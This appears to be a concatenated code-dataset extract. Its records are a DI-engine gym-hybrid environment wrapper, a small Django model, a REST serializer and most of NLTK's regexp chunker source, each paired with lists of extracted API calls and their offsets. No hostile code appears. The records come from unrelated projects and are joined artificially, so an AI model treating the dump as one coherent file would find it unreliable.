self._env.metadata["render.modes"] = ["human", "rgb_array"]
self._init_flag = True
if hasattr(self, '_seed') and hasattr(self, '_dynamic_seed') and self._dynamic_seed:
np_seed = 100 * np.random.randint(1, 1000)
self._env.seed(self._seed + np_seed)
elif hasattr(self, '_seed'):
self._env.seed(self._seed)
self._final_eval_reward = 0
obs = self._env.reset()
obs = to_ndarray(obs).astype(np.float32)
return obs
def close(self) -> None:
if self._init_flag:
self._env.close()
self._init_flag = False
def seed(self, seed: int, dynamic_seed: bool = True) -> None:
self._seed = seed
self._dynamic_seed = dynamic_seed
np.random.seed(self._seed)
def step(self, action: Dict) -> BaseEnvTimestep:
if self._act_scale:
# acceleration_value.
action['action_args'][0] = affine_transform(action['action_args'][0], min_val=0, max_val=1)
            # rotation_value. The following line could be omitted, because the
            # affine_transform function already performs the clip(-1, 1) operation.
action['action_args'][1] = affine_transform(action['action_args'][1], min_val=-1, max_val=1)
action = [action['action_type'], action['action_args']]
obs, rew, done, info = self._env.step(action)
self._final_eval_reward += rew
if done:
info['final_eval_reward'] = self._final_eval_reward
obs = to_ndarray(obs)
if isinstance(obs, list): # corner case
for i in range(len(obs)):
if len(obs[i].shape) == 0:
obs[i] = np.array([obs[i]])
obs = np.concatenate(obs)
assert isinstance(obs, np.ndarray) and obs.shape == (10, )
obs = obs.astype(np.float32)
        rew = to_ndarray([rew])  # wrapped to be transferred to a numpy array with shape (1,)
if isinstance(rew, list):
rew = rew[0]
assert isinstance(rew, np.ndarray) and rew.shape == (1, )
info['action_args_mask'] = np.array([[1, 0], [0, 1], [0, 0]])
return BaseEnvTimestep(obs, rew, done, info)
def get_random_action(self) -> Dict:
# action_type: 0, 1, 2
# action_args:
# - acceleration_value: [0, 1]
# - rotation_value: [-1, 1]
raw_action = self._env.action_space.sample()
return {'action_type': raw_action[0], 'action_args': raw_action[1]}
def info(self) -> BaseEnvInfo:
T = EnvElementInfo
return BaseEnvInfo(
agent_num=1,
obs_space=T(
(10, ),
{
'min': -1,
'max': 2,
'dtype': np.float32,
},
),
# [min, max)
act_space=T(
(3, ),
{
'min': 0,
'max': 3,
'dtype': int,
},
),
rew_space=T(
(1, ),
{
'min': -1.0,
'max': 1.0
},
),
use_wrappers=None,
)
def __repr__(self) -> str:
return "DI-engine gym hybrid Env"
def enable_save_replay(self, replay_path: Optional[str] = None) -> None:
if replay_path is None:
replay_path = './video'
self._replay_path = replay_path
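# --- Illustrative sketch (added; assumes the gym_hybrid package registers 'Moving-v0') ---
def _random_rollout_demo(num_steps: int = 5) -> None:
    env = GymHybridEnv(EasyDict(env_id='Moving-v0', act_scale=True))
    env.seed(0)
    env.reset()
    for _ in range(num_steps):
        # get_random_action() returns the {'action_type', 'action_args'} dict
        # that step() expects; step() returns a BaseEnvTimestep namedtuple.
        timestep = env.step(env.get_random_action())
        if timestep.done:
            break
    env.close()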
|
[
"numpy.random.seed",
"gym.make",
"ding.torch_utils.to_ndarray",
"gym.wrappers.Monitor",
"ding.envs.BaseEnvTimestep",
"numpy.random.randint",
"numpy.array",
"ding.utils.ENV_REGISTRY.register",
"numpy.concatenate",
"ding.envs.common.affine_transform"
] |
[((364, 399), 'ding.utils.ENV_REGISTRY.register', 'ENV_REGISTRY.register', (['"""gym_hybrid"""'], {}), "('gym_hybrid')\n", (385, 399), False, 'from ding.utils import ENV_REGISTRY\n'), ((1853, 1879), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (1867, 1879), True, 'import numpy as np\n'), ((2624, 2639), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['obs'], {}), '(obs)\n', (2634, 2639), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((2975, 2992), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['[rew]'], {}), '([rew])\n', (2985, 2992), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((3214, 3248), 'numpy.array', 'np.array', (['[[1, 0], [0, 1], [0, 0]]'], {}), '([[1, 0], [0, 1], [0, 0]])\n', (3222, 3248), True, 'import numpy as np\n'), ((3264, 3301), 'ding.envs.BaseEnvTimestep', 'BaseEnvTimestep', (['obs', 'rew', 'done', 'info'], {}), '(obs, rew, done, info)\n', (3279, 3301), False, 'from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo\n'), ((832, 854), 'gym.make', 'gym.make', (['self._env_id'], {}), '(self._env_id)\n', (840, 854), False, 'import gym\n'), ((2035, 2099), 'ding.envs.common.affine_transform', 'affine_transform', (["action['action_args'][0]"], {'min_val': '(0)', 'max_val': '(1)'}), "(action['action_args'][0], min_val=0, max_val=1)\n", (2051, 2099), False, 'from ding.envs.common import EnvElementInfo, affine_transform\n'), ((2302, 2367), 'ding.envs.common.affine_transform', 'affine_transform', (["action['action_args'][1]"], {'min_val': '(-1)', 'max_val': '(1)'}), "(action['action_args'][1], min_val=-1, max_val=1)\n", (2318, 2367), False, 'from ding.envs.common import EnvElementInfo, affine_transform\n'), ((2836, 2855), 'numpy.concatenate', 'np.concatenate', (['obs'], {}), '(obs)\n', (2850, 2855), True, 'import numpy as np\n'), ((929, 1035), 'gym.wrappers.Monitor', 'gym.wrappers.Monitor', (['self._env', 'self._replay_path'], {'video_callable': '(lambda episode_id: True)', 'force': '(True)'}), '(self._env, self._replay_path, video_callable=lambda\n episode_id: True, force=True)\n', (949, 1035), False, 'import gym\n'), ((1302, 1328), 'numpy.random.randint', 'np.random.randint', (['(1)', '(1000)'], {}), '(1, 1000)\n', (1319, 1328), True, 'import numpy as np\n'), ((1536, 1551), 'ding.torch_utils.to_ndarray', 'to_ndarray', (['obs'], {}), '(obs)\n', (1546, 1551), False, 'from ding.torch_utils import to_ndarray, to_list\n'), ((2799, 2817), 'numpy.array', 'np.array', (['[obs[i]]'], {}), '([obs[i]])\n', (2807, 2817), True, 'import numpy as np\n')]
|
from django.db import models
class City(models.Model):
city_name = models.TextField()
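# Illustrative usage (added; assumes a configured Django project with migrations applied):
#   City.objects.create(city_name="Springfield")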
|
[
"django.db.models.TextField"
] |
[((73, 91), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (89, 91), False, 'from django.db import models\n')]
|
from rest_framework import serializers
from apis_core.apis_vocabularies.serializers import LabelTypeMinimalSerializer
from .models import Label
class LabelSerializerLegacy(serializers.ModelSerializer):
label_type = LabelTypeMinimalSerializer()
class Meta:
model = Label
fields = ('id', 'label', 'isoCode_639_3', 'label_type')
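# Illustrative usage (added; assumes an existing Label instance `lbl`):
#   LabelSerializerLegacy(lbl).data
#   # -> {'id': ..., 'label': ..., 'isoCode_639_3': ..., 'label_type': {...}}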
|
[
"apis_core.apis_vocabularies.serializers.LabelTypeMinimalSerializer"
] |
[((222, 250), 'apis_core.apis_vocabularies.serializers.LabelTypeMinimalSerializer', 'LabelTypeMinimalSerializer', ([], {}), '()\n', (248, 250), False, 'from apis_core.apis_vocabularies.serializers import LabelTypeMinimalSerializer\n')]
|
# Natural Language Toolkit: Regular Expression Chunkers
#
# Copyright (C) 2001-2022 NLTK Project
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>> (minor additions)
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
import re
from nltk.chunk.api import ChunkParserI
from nltk.tree import Tree
# //////////////////////////////////////////////////////
# ChunkString
# //////////////////////////////////////////////////////
class ChunkString:
"""
A string-based encoding of a particular chunking of a text.
Internally, the ``ChunkString`` class uses a single string to
encode the chunking of the input text. This string contains a
sequence of angle-bracket delimited tags, with chunking indicated
by braces. An example of this encoding is::
{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}<.>{<DT><NN>}<VBD><.>
    ``ChunkString`` objects are created from tagged texts (i.e., lists of
``tokens`` whose type is ``TaggedType``). Initially, nothing is
chunked.
The chunking of a ``ChunkString`` can be modified with the ``xform()``
method, which uses a regular expression to transform the string
representation. These transformations should only add and remove
braces; they should *not* modify the sequence of angle-bracket
delimited tags.
:type _str: str
:ivar _str: The internal string representation of the text's
encoding. This string representation contains a sequence of
angle-bracket delimited tags, with chunking indicated by
braces. An example of this encoding is::
{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}<.>{<DT><NN>}<VBD><.>
:type _pieces: list(tagged tokens and chunks)
:ivar _pieces: The tagged tokens and chunks encoded by this ``ChunkString``.
:ivar _debug: The debug level. See the constructor docs.
:cvar IN_CHUNK_PATTERN: A zero-width regexp pattern string that
will only match positions that are in chunks.
:cvar IN_STRIP_PATTERN: A zero-width regexp pattern string that
will only match positions that are in strips.
"""
CHUNK_TAG_CHAR = r"[^\{\}<>]"
CHUNK_TAG = r"(<%s+?>)" % CHUNK_TAG_CHAR
IN_CHUNK_PATTERN = r"(?=[^\{]*\})"
IN_STRIP_PATTERN = r"(?=[^\}]*(\{|$))"
# These are used by _verify
_CHUNK = r"(\{%s+?\})+?" % CHUNK_TAG
_STRIP = r"(%s+?)+?" % CHUNK_TAG
_VALID = re.compile(r"^(\{?%s\}?)*?$" % CHUNK_TAG)
_BRACKETS = re.compile(r"[^\{\}]+")
_BALANCED_BRACKETS = re.compile(r"(\{\})*$")
def __init__(self, chunk_struct, debug_level=1):
"""
Construct a new ``ChunkString`` that encodes the chunking of
the text ``tagged_tokens``.
:type chunk_struct: Tree
:param chunk_struct: The chunk structure to be further chunked.
:type debug_level: int
:param debug_level: The level of debugging which should be
applied to transformations on the ``ChunkString``. The
valid levels are:
- 0: no checks
- 1: full check on to_chunkstruct
- 2: full check on to_chunkstruct and cursory check after
each transformation.
- 3: full check on to_chunkstruct and full check after
each transformation.
We recommend you use at least level 1. You should
probably use level 3 if you use any non-standard
subclasses of ``RegexpChunkRule``.
"""
self._root_label = chunk_struct.label()
self._pieces = chunk_struct[:]
tags = [self._tag(tok) for tok in self._pieces]
self._str = "<" + "><".join(tags) + ">"
self._debug = debug_level
def _tag(self, tok):
if isinstance(tok, tuple):
return tok[1]
elif isinstance(tok, Tree):
return tok.label()
else:
raise ValueError("chunk structures must contain tagged " "tokens or trees")
def _verify(self, s, verify_tags):
"""
Check to make sure that ``s`` still corresponds to some chunked
version of ``_pieces``.
:type verify_tags: bool
:param verify_tags: Whether the individual tags should be
checked. If this is false, ``_verify`` will check to make
sure that ``_str`` encodes a chunked version of *some*
list of tokens. If this is true, then ``_verify`` will
check to make sure that the tags in ``_str`` match those in
``_pieces``.
:raise ValueError: if the internal string representation of
this ``ChunkString`` is invalid or not consistent with _pieces.
"""
# Check overall form
if not ChunkString._VALID.match(s):
raise ValueError(
"Transformation generated invalid " "chunkstring:\n %s" % s
)
# Check that parens are balanced. If the string is long, we
# have to do this in pieces, to avoid a maximum recursion
# depth limit for regular expressions.
brackets = ChunkString._BRACKETS.sub("", s)
for i in range(1 + len(brackets) // 5000):
substr = brackets[i * 5000 : i * 5000 + 5000]
if not ChunkString._BALANCED_BRACKETS.match(substr):
raise ValueError(
"Transformation generated invalid " "chunkstring:\n %s" % s
)
if verify_tags <= 0:
return
tags1 = (re.split(r"[\{\}<>]+", s))[1:-1]
tags2 = [self._tag(piece) for piece in self._pieces]
if tags1 != tags2:
raise ValueError(
"Transformation generated invalid " "chunkstring: tag changed"
)
def to_chunkstruct(self, chunk_label="CHUNK"):
"""
Return the chunk structure encoded by this ``ChunkString``.
:rtype: Tree
:raise ValueError: If a transformation has generated an
invalid chunkstring.
"""
if self._debug > 0:
self._verify(self._str, 1)
# Use this alternating list to create the chunkstruct.
pieces = []
index = 0
piece_in_chunk = 0
for piece in re.split("[{}]", self._str):
# Find the list of tokens contained in this piece.
length = piece.count("<")
subsequence = self._pieces[index : index + length]
# Add this list of tokens to our pieces.
if piece_in_chunk:
pieces.append(Tree(chunk_label, subsequence))
else:
pieces += subsequence
# Update index, piece_in_chunk
index += length
piece_in_chunk = not piece_in_chunk
return Tree(self._root_label, pieces)
def xform(self, regexp, repl):
"""
Apply the given transformation to the string encoding of this
``ChunkString``. In particular, find all occurrences that match
``regexp``, and replace them using ``repl`` (as done by
``re.sub``).
This transformation should only add and remove braces; it
should *not* modify the sequence of angle-bracket delimited
tags. Furthermore, this transformation may not result in
improper bracketing. Note, in particular, that bracketing may
not be nested.
:type regexp: str or regexp
:param regexp: A regular expression matching the substring
that should be replaced. This will typically include a
named group, which can be used by ``repl``.
:type repl: str
:param repl: An expression specifying what should replace the
matched substring. Typically, this will include a named
replacement group, specified by ``regexp``.
:rtype: None
:raise ValueError: If this transformation generated an
invalid chunkstring.
"""
# Do the actual substitution
s = re.sub(regexp, repl, self._str)
# The substitution might have generated "empty chunks"
# (substrings of the form "{}"). Remove them, so they don't
# interfere with other transformations.
s = re.sub(r"\{\}", "", s)
# Make sure that the transformation was legal.
if self._debug > 1:
self._verify(s, self._debug - 2)
# Commit the transformation.
self._str = s
def __repr__(self):
"""
Return a string representation of this ``ChunkString``.
It has the form::
<ChunkString: '{<DT><JJ><NN>}<VBN><IN>{<DT><NN>}'>
:rtype: str
"""
return "<ChunkString: %s>" % repr(self._str)
def __str__(self):
"""
Return a formatted representation of this ``ChunkString``.
This representation will include extra spaces to ensure that
tags will line up with the representation of other
``ChunkStrings`` for the same text, regardless of the chunking.
:rtype: str
"""
# Add spaces to make everything line up.
str = re.sub(r">(?!\})", r"> ", self._str)
str = re.sub(r"([^\{])<", r"\1 <", str)
if str[0] == "<":
str = " " + str
return str
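# --- Illustrative sketch (added; not part of the NLTK source) ---
def _chunkstring_demo():
    tagged = Tree("S", [("the", "DT"), ("cat", "NN"), ("sat", "VBD")])
    cs = ChunkString(tagged)  # internal string is "<DT><NN><VBD>"
    cs.xform(re.compile(r"(?P<np><DT><NN>)"), r"{\g<np>}")  # chunk DT+NN
    return cs.to_chunkstruct(chunk_label="NP")  # (S (NP the/DT cat/NN) sat/VBD)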
# //////////////////////////////////////////////////////
# Chunking Rules
# //////////////////////////////////////////////////////
class RegexpChunkRule:
"""
A rule specifying how to modify the chunking in a ``ChunkString``,
using a transformational regular expression. The
``RegexpChunkRule`` class itself can be used to implement any
transformational rule based on regular expressions. There are
also a number of subclasses, which can be used to implement
simpler types of rules, based on matching regular expressions.
Each ``RegexpChunkRule`` has a regular expression and a
replacement expression. When a ``RegexpChunkRule`` is "applied"
to a ``ChunkString``, it searches the ``ChunkString`` for any
substring that matches the regular expression, and replaces it
using the replacement expression. This search/replace operation
has the same semantics as ``re.sub``.
Each ``RegexpChunkRule`` also has a description string, which
gives a short (typically less than 75 characters) description of
the purpose of the rule.
    The transformation defined by this ``RegexpChunkRule`` should
only add and remove braces; it should *not* modify the sequence
of angle-bracket delimited tags. Furthermore, this transformation
may not result in nested or mismatched bracketing.
"""
def __init__(self, regexp, repl, descr):
"""
Construct a new RegexpChunkRule.
:type regexp: regexp or str
:param regexp: The regular expression for this ``RegexpChunkRule``.
When this rule is applied to a ``ChunkString``, any
substring that matches ``regexp`` will be replaced using
the replacement string ``repl``. Note that this must be a
normal regular expression, not a tag pattern.
:type repl: str
:param repl: The replacement expression for this ``RegexpChunkRule``.
When this rule is applied to a ``ChunkString``, any substring
that matches ``regexp`` will be replaced using ``repl``.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
if isinstance(regexp, str):
regexp = re.compile(regexp)
self._repl = repl
self._descr = descr
self._regexp = regexp
def apply(self, chunkstr):
# Keep docstring generic so we can inherit it.
"""
Apply this rule to the given ``ChunkString``. See the
class reference documentation for a description of what it
means to apply a rule.
:type chunkstr: ChunkString
:param chunkstr: The chunkstring to which this rule is applied.
:rtype: None
:raise ValueError: If this transformation generated an
invalid chunkstring.
"""
chunkstr.xform(self._regexp, self._repl)
def descr(self):
"""
Return a short description of the purpose and/or effect of
this rule.
:rtype: str
"""
return self._descr
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<RegexpChunkRule: '{<IN|VB.*>}'->'<IN>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<RegexpChunkRule: "
+ repr(self._regexp.pattern)
+ "->"
+ repr(self._repl)
+ ">"
)
@staticmethod
def fromstring(s):
"""
Create a RegexpChunkRule from a string description.
Currently, the following formats are supported::
{regexp} # chunk rule
}regexp{ # strip rule
regexp}{regexp # split rule
regexp{}regexp # merge rule
Where ``regexp`` is a regular expression for the rule. Any
text following the comment marker (``#``) will be used as
the rule's description:
>>> from nltk.chunk.regexp import RegexpChunkRule
>>> RegexpChunkRule.fromstring('{<DT>?<NN.*>+}')
<ChunkRule: '<DT>?<NN.*>+'>
"""
# Split off the comment (but don't split on '\#')
m = re.match(r"(?P<rule>(\\.|[^#])*)(?P<comment>#.*)?", s)
rule = m.group("rule").strip()
comment = (m.group("comment") or "")[1:].strip()
# Pattern bodies: chunk, strip, split, merge
try:
if not rule:
raise ValueError("Empty chunk pattern")
if rule[0] == "{" and rule[-1] == "}":
return ChunkRule(rule[1:-1], comment)
elif rule[0] == "}" and rule[-1] == "{":
return StripRule(rule[1:-1], comment)
elif "}{" in rule:
left, right = rule.split("}{")
return SplitRule(left, right, comment)
elif "{}" in rule:
left, right = rule.split("{}")
return MergeRule(left, right, comment)
elif re.match("[^{}]*{[^{}]*}[^{}]*", rule):
left, chunk, right = re.split("[{}]", rule)
return ChunkRuleWithContext(left, chunk, right, comment)
else:
raise ValueError("Illegal chunk pattern: %s" % rule)
except (ValueError, re.error) as e:
raise ValueError("Illegal chunk pattern: %s" % rule) from e
class ChunkRule(RegexpChunkRule):
"""
A rule specifying how to add chunks to a ``ChunkString``, using a
matching tag pattern. When applied to a ``ChunkString``, it will
find any substring that matches this tag pattern and that is not
already part of a chunk, and create a new chunk containing that
substring.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``ChunkRule``.
:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
chunk any substring that matches this tag pattern and that
is not already part of a chunk.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(
"(?P<chunk>%s)%s"
% (tag_pattern2re_pattern(tag_pattern), ChunkString.IN_STRIP_PATTERN)
)
RegexpChunkRule.__init__(self, regexp, r"{\g<chunk>}", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ChunkRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<ChunkRule: " + repr(self._pattern) + ">"
class StripRule(RegexpChunkRule):
"""
    A rule specifying how to remove strips from a ``ChunkString``,
using a matching tag pattern. When applied to a
``ChunkString``, it will find any substring that matches this
tag pattern and that is contained in a chunk, and remove it
from that chunk, thus creating two new chunks.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``StripRule``.
:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
find any substring that matches this tag pattern and that
is contained in a chunk, and remove it from that chunk,
thus creating two new chunks.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(
"(?P<strip>%s)%s"
% (tag_pattern2re_pattern(tag_pattern), ChunkString.IN_CHUNK_PATTERN)
)
RegexpChunkRule.__init__(self, regexp, r"}\g<strip>{", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<StripRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<StripRule: " + repr(self._pattern) + ">"
class UnChunkRule(RegexpChunkRule):
"""
    A rule specifying how to remove chunks from a ``ChunkString``,
using a matching tag pattern. When applied to a
``ChunkString``, it will find any complete chunk that matches this
tag pattern, and un-chunk it.
"""
def __init__(self, tag_pattern, descr):
"""
Construct a new ``UnChunkRule``.
:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
find any complete chunk that matches this tag pattern,
and un-chunk it.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(r"\{(?P<chunk>%s)\}" % tag_pattern2re_pattern(tag_pattern))
RegexpChunkRule.__init__(self, regexp, r"\g<chunk>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<UnChunkRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<UnChunkRule: " + repr(self._pattern) + ">"
class MergeRule(RegexpChunkRule):
"""
A rule specifying how to merge chunks in a ``ChunkString``, using
two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk whose end
matches left pattern, and immediately followed by a chunk whose
beginning matches right pattern. It will then merge those two
chunks into a single chunk.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``MergeRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
``left_tag_pattern``, and immediately followed by a chunk
whose beginning matches this pattern. It will
then merge those two chunks into a single chunk.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
this pattern, and immediately followed by a chunk
whose beginning matches ``right_tag_pattern``. It will
then merge those two chunks into a single chunk.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
"(?P<left>%s)}{(?=%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<MergeRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<MergeRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class SplitRule(RegexpChunkRule):
"""
A rule specifying how to split chunks in a ``ChunkString``, using
two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk that
matches the left pattern followed by the right pattern. It will
then split the chunk into two new chunks, at the point between the
two pattern matches.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``SplitRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this rule will
find any chunk containing a substring that matches
``left_tag_pattern`` followed by this pattern. It will
then split the chunk into two new chunks at the point
between these two matching patterns.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this rule will
find any chunk containing a substring that matches this
pattern followed by ``right_tag_pattern``. It will then
split the chunk into two new chunks at the point between
these two matching patterns.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
"(?P<left>%s)(?=%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>}{", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<SplitRule: '<NN>', '<DT>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<SplitRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ExpandLeftRule(RegexpChunkRule):
"""
A rule specifying how to expand chunks in a ``ChunkString`` to the left,
using two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk whose beginning
matches right pattern, and immediately preceded by a strip whose
end matches left pattern. It will then expand the chunk to incorporate
the new material on the left.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
        Construct a new ``ExpandLeftRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
            rule will find any chunk whose beginning matches
            this pattern, and immediately preceded by a strip
            whose end matches ``left_tag_pattern``. It will
            then expand the chunk to incorporate the new material on the left.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
            rule will find any chunk whose beginning matches
            ``right_tag_pattern``, and immediately preceded by a strip
            whose end matches this pattern. It will
then expand the chunk to incorporate the new material on the left.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
r"(?P<left>%s)\{(?P<right>%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"{\g<left>\g<right>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ExpandLeftRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<ExpandLeftRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ExpandRightRule(RegexpChunkRule):
"""
A rule specifying how to expand chunks in a ``ChunkString`` to the
right, using two matching tag patterns: a left pattern, and a
right pattern. When applied to a ``ChunkString``, it will find any
chunk whose end matches left pattern, and immediately followed by
a strip whose beginning matches right pattern. It will then
expand the chunk to incorporate the new material on the right.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``ExpandRightRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
``left_tag_pattern``, and immediately followed by a strip
whose beginning matches this pattern. It will
            then expand the chunk to incorporate the new material on the right.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
this pattern, and immediately followed by a strip
whose beginning matches ``right_tag_pattern``. It will
then expand the chunk to incorporate the new material on the right.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
r"(?P<left>%s)\}(?P<right>%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>\g<right>}", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ExpandRightRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<ExpandRightRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ChunkRuleWithContext(RegexpChunkRule):
"""
A rule specifying how to add chunks to a ``ChunkString``, using
three matching tag patterns: one for the left context, one for the
chunk, and one for the right context. When applied to a
``ChunkString``, it will find any substring that matches the chunk
tag pattern, is surrounded by substrings that match the two
context patterns, and is not already part of a chunk; and create a
new chunk containing the substring that matched the chunk tag
pattern.
Caveat: Both the left and right context are consumed when this
rule matches; therefore, if you need to find overlapping matches,
you will need to apply your rule more than once.
"""
def __init__(
self,
left_context_tag_pattern,
chunk_tag_pattern,
right_context_tag_pattern,
descr,
):
"""
Construct a new ``ChunkRuleWithContext``.
:type left_context_tag_pattern: str
:param left_context_tag_pattern: A tag pattern that must match
the left context of ``chunk_tag_pattern`` for this rule to
apply.
:type chunk_tag_pattern: str
:param chunk_tag_pattern: A tag pattern that must match for this
rule to apply. If the rule does apply, then this pattern
also identifies the substring that will be made into a chunk.
:type right_context_tag_pattern: str
:param right_context_tag_pattern: A tag pattern that must match
the right context of ``chunk_tag_pattern`` for this rule to
apply.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_context_tag_pattern))
re.compile(tag_pattern2re_pattern(chunk_tag_pattern))
re.compile(tag_pattern2re_pattern(right_context_tag_pattern))
self._left_context_tag_pattern = left_context_tag_pattern
self._chunk_tag_pattern = chunk_tag_pattern
self._right_context_tag_pattern = right_context_tag_pattern
regexp = re.compile(
"(?P<left>%s)(?P<chunk>%s)(?P<right>%s)%s"
% (
tag_pattern2re_pattern(left_context_tag_pattern),
tag_pattern2re_pattern(chunk_tag_pattern),
tag_pattern2re_pattern(right_context_tag_pattern),
ChunkString.IN_STRIP_PATTERN,
)
)
replacement = r"\g<left>{\g<chunk>}\g<right>"
RegexpChunkRule.__init__(self, regexp, replacement, descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ChunkRuleWithContext: '<IN>', '<NN>', '<DT>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<ChunkRuleWithContext: {!r}, {!r}, {!r}>".format(
